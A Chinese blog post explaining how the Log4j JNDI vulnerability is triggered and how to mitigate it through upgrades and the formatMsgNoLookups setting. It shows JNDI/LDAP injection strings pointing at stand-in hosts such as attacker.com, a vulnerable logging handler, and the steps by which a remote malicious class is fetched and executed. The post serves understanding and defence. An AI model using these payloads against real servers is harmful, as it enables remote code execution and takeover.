log4j漏洞产生方法和预防

已于 2022-02-14 15:51:15 修改
阅读量4.1k 收藏 1
点赞数 2
文章标签: 安全 java 后端 开发语言 spring boot
于 2021-12-13 11:49:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Koikoi12/article/details/121902133
版权

关于日志的内容还可以看我写的其他文章:
log4j漏洞成因和原理(JNDI和LDAP)

Java各类日志门面(slf4j,commons-logging)和日志框架(log4j,logback)联系和区别

产生方法

https://0xsapra.github.io/website/CVE-2019-17571

在这里插入图片描述
核心部分${jndi:ldap://xxxxx.dnslog.cn/exp}
想办法把用户输入的可执行字符串送到这个位置就行了,日志里经常打印请求参数之类用户输入的内容,比如"参数a:<请求的输入

攻击伪代码示例:

import org.apache.log4j.Logger;

import java.io.*;
import java.sql.SQLException;
import java.util.*;

public class VulnerableLog4jExampleHandler implements HttpHandler {

  static Logger log = Logger.getLogger(log4jExample.class.getName());

  /**
 * 示例伪代码:一个简单的HTTP端点,其中读取User Agent信息并进行日志记录;
   */
  public void handle(HttpExchange he) throws IOException {
  	// 获取user-agent信息
    String userAgent = he.getRequestHeader("user-agent");
    
    // 此行记录日志的代码,通过记录攻击者控制的HTTP用户代理标头来触发RCE。
    // 攻击者可以设置他们的User-Agent header到${jndi:ldap://attacker.com/a}
    log.info("Request User Agent:" + userAgent);

    String response = "<h1>Hello There, " + userAgent + "!</h1>";
    he.sendResponseHeaders(200, response.length());
    OutputStream os = he.getResponseBody();
    os.write(response.getBytes());
    os.close();
  }
}

基于上述代码的基本攻击步骤:

  • 请求对应的HTTP端点(或接口),在请求信息中携带攻击代码(比如,在user-agent中携带${jndi:ldap://attacker.com/a})
  • 服务器在通过Log4j2执行日志记录时,记录中包含了基于JNDI和LDAP的恶意负载${jndi:ldap://attacker.com/a},其中attacker.com是攻击者控制的地址。
  • 记录日志操作触发向攻击者控制的地址发送请求。
  • 对应请求返回在响应中返回可执行的恶意代码,注入到服务器进程当中。比如返回,https://attacker.com/Attack.class
  • 进而执行脚本控制服务器。

在这里插入图片描述在这里插入图片描述

预防

Apache Log4j 远程代码执行漏洞

影响版本

经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下:

Apache Log4j 2.x < 2.15.0-rc2

最新修复版本:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

安全建议

1、排查应用是否引入了Apache log4j-core Jar包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响。请尽快升级Apache Log4j2所有相关应用到最新的 log4j-2.15.0-rc2 版本,地址 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

2、升级已知受影响的应用及组件,如 spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink

3、可升级jdk版本至6u211 / 7u201 / 8u191 / 11.0.1以上,可以在一定程度上限制JNDI等漏洞利用方式。

补救方案

方案一:升级版本,发布系统;
方案二:临时补救:

  • 修改JVM参数,设置 -Dlog4j2.formatMsgNoLookups=true
  • 在涉及漏洞的项目的类路径(classpath)下增加log4j2.component.properties配置文件并增加配置项log4j2.formatMsgNoLookups=true
  • 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

还好我们用的是logback
在这里插入图片描述

Koikoi123
关注
深入分析Log4j 漏洞
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
log4j2远程代码执行漏洞根本原因分析 | log4j bug 复现
清云逸仙的博客
12-14 2228
一、 背景 近年来技术开源热潮席卷全球,诸多信息领域大厂及开发者争相拥抱开源,将其推上了前所未有的高度。 然而,最近全球知名开源日志组件 Apache Log4j2 被阿里团队曝出严重高危漏洞。该漏洞让黑客不用知道服务器账号,就可以做到如入无人之境,进而对你的服务做任何你可以想象到的破坏。 Apache Log4j2 这一漏洞被称为 " 史诗级 " 高危漏洞,服务器业务(Steam、iCloud、Minecraft 等)被严重影响。尽管后续 Apache ...
“核弹级” Log4j 漏洞仍普遍存在,并造成持续影响
码农code之路
07-26 172
出品:OSCHINA,编辑:白开水不加糖来源:https://www.oschina.net/news/203874/log4j-the-pain-just-keeps-going-and-goingLog4j “核弹级” 漏洞 Log4Shell 或许将永远影响世界。美国国土安全部 (DHS) 网络安全审查委员会 (CSRB) 近日发布了针对去年Log4Shell漏洞...
log4j漏洞
远行的博客
12-12 705
文章目录1JNDI 1 JNDI https://blog.csdn.net/liushuai_ly/article/details/8634957 https://blog.csdn.net/liushuai_ly/article/details/8634957
log4j 漏洞
系统看你学习很认真,随机送了一个月会员!
12-13 4835
突发!Log4j 爆“核弹级”漏洞,Flink、Kafka等至少十多个项目受影响 Apache Log4j远程代码执行漏洞 | 二次安全通告
log4j漏洞 [log4j]
刘贵庆的博客
01-06 3417
log4j漏洞及解决方法安全漏洞 CVE-2021-45046 让Apache紧急升级,刚升级完,又发现安全漏洞 CVE-2021-45105,修复方法如下:
Apache Log4j Server 反序列化漏洞(CVE-2017-5645)
Kevin's Blog
01-18 4804
文章目录一、漏洞介绍1.1 漏洞介绍1.2 影响版本二、漏洞复现三、防御措施 一、漏洞介绍 1.1 漏洞介绍   Apache的一个开源的日志记录库,通过使用Log4j语言接口,可以在C、C++、.Net、PL/SQL程序中方便使用,其语法和用法与在Java程序中一样,使得多语言分布式系统得到一个统一一致的日志组件模块。通过使用三方扩展,可以将Log4j集成到J2EE、JINI甚至是SNMP应用中。但Log4j2.8.2之前的版本中存在反序列化漏洞。 1.2 影响版本 Log4j<2.8.2 二、
log4j2漏洞补丁log4j2.15-rc2 log4j2.16.0.zip
12-14
本文将详细解析Log4j2漏洞的本质,探讨其影响,并介绍修复此漏洞的两个关键补丁——log4j2.15-rc2和log4j2.16.0,以及如何应用这些补丁以确保系统的安全性。 Log4j2是Apache软件基金会开发的一个广泛使用的Java日志...
扫描log4j2 版本扫描log4j2 版本
12-16
综上所述,"扫描log4j2版本"是一项至关重要的安全措施,它可以帮助我们预防和应对潜在的安全风险。通过使用专门的工具和遵循最佳实践,我们可以确保系统的稳定性和安全性,防止因Log4j2等关键组件的漏洞而引发的数据...
log4j2版本漏洞 修复版本2.16.0
12-17
Log4j2版本漏洞与修复方案:聚焦2.16.0》 在软件安全领域,漏洞的存在如同定时炸弹,随时可能引发严重后果。其中,Log4j2漏洞问题备受关注,尤其是在2021年曝光的“Log4Shell”漏洞(CVE-2021-44228)更是引起...
Log4J2远程代码执行漏洞修复20211210.rar
12-13
漏洞的关键在于Log4J2的`lookup`方法,它允许用户在日志消息中使用`${...}`占位符引用动态变量。攻击者可以构造一个特殊的`${jndi:ldap://}`或`${jndi:rmi://}`格式的字符串,当这些字符串被记录时,Log4J2会尝试...
log4j漏洞是什么
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-18 1518
log4j漏洞是什么,Log4j 是一款开源软件,开发者已经将其集成到数百万个系统中。这种无孔不入、无处不在的软件中的漏洞有能力影响全世界的公司和组织(包括政府)。自从2021年11月曝光的Log4j漏洞已成为一大“持续性流行漏洞”,将在未来多年引发持续风险,换言之,这种无所不在的软件库的未经修复版本,将在未来十年或更长时间内继续留存在各类系统当中。同时,美国网络安全审查委员会预测,鉴于 Log4j的普遍存在,在未来十年中,易受攻击的版本仍将存在于系统中,我们将看到利用漏洞的方式不断演变,所有组织都应具备发
Log4j漏洞分析
a1290320893的博客
12-13 2644
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 2579
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
log4j漏洞分析
遇事不决冲冲冲
03-22 2428
Log4j漏洞复现步骤,Log4j断点分析,Log4j漏洞中2.15.0-RC1断定分析,以及绕过方法Log4j2.15.0-RC2修复原理
log4j漏洞详解
最新发布
weixin_61638307的博客
03-21 4285
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
Log4j2 重大漏洞!上万个项目中枪...
WantFlyDaCheng的博客
12-11 279
大家好,我是 乔戈里。今天一大早就看到群里有小伙伴说 Log4j2 的远程代码执行漏洞的事情,在这里再提示一下,以防有小伙伴还没有看到。Apache 这次又要背锅了,这漏洞的影响范围太广(...
Log4j 2漏洞应急处理与检测工具教程
通过本资源的处置指南和检测工具,用户可以有效地识别和修复Log4j 2代码漏洞。然而,确保应用系统的长期安全需要持续的努力和关注。用户应将安全意识融入日常开发和运维实践中,确保在未来能够迅速响应各种安全威胁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值